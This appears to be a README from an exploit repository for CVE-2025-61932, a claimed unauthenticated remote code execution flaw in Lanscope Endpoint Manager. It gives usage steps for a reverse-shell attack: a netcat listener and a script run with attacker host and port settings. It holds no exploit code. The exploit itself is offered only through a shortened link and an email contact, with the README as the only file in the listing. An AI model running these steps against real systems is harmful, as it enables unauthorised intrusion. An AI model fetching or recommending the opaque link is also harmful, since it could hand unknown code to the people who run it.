# Lanscope Endpoint Manager RCE Exploit (CVE-2025-61932)
## Overview
CVE-2025-61932 is a critical unauthenticated remote code execution (RCE) vulnerability in Lanscope Endpoint Manager On-Premises, specifically the Client program (MR) and Detection Agent (DA) components. The flaw lies in the improper validation of incoming network packets, allowing attackers to craft malicious packets that trigger a buffer overflow in the service’s request handling logic. This results in arbitrary code execution with SYSTEM privileges on Windows or root privileges on Linux, depending on the deployment.
The vulnerability originates in the network listener service, which operates on TCP ports 445 (default), 135, or user-configured ports. The service fails to verify the source of incoming packets, assuming they originate from trusted endpoints. By spoofing headers to mimic legitimate agent communication, attackers can inject malicious payloads into the input buffer of the MR or DA module, leading to memory corruption and code execution.
## Requirements
- Python 3.8+
- Scapy library.
- Target IP and port.
## Usage
1. Install dependencies: `pip install scapy`
2. Vulnerability Check: `python cve-2025-61932.py --target 192.168.1.100 --check`
3. Set up a listener to receive the reverse shell: `nc -lvnp 4444`
4. Run: `python cve-2025-61932.py --target <IP> --port 445 --lhost <YOUR_IP> --lport 4444`
## Disclaimer
This is for authorized testing only. Use at your own risk. Not responsible for misuse.
## Exploit
[href](https://tinyurl.com/2jxd2uww)
For any inquiries, please email me at: anthonmullins@op.pl
[4.0K] /data/pocs/98577a1e63ee1cee1de920d29c670b30fc167039
└── [1.6K] README.md
0 directories, 1 file